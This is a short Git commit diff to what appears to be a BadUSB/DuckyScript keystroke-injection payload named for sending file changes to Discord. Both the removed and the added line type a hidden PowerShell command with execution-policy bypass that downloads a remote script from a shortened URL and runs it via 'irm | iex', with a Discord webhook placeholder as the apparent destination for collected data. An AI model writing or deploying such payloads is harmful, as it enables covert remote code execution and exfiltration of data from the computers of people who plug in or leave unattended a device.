Update File-Changes-to-Discord.txt

This commit is contained in:
egieb
2023-12-29 22:30:48 +00:00
committed by GitHub
parent 3058f40f63
commit 40d9c61b57
@@ -14,7 +14,7 @@ REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_fm_to_dc | iex
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_fm_to_dc | iex
ENTER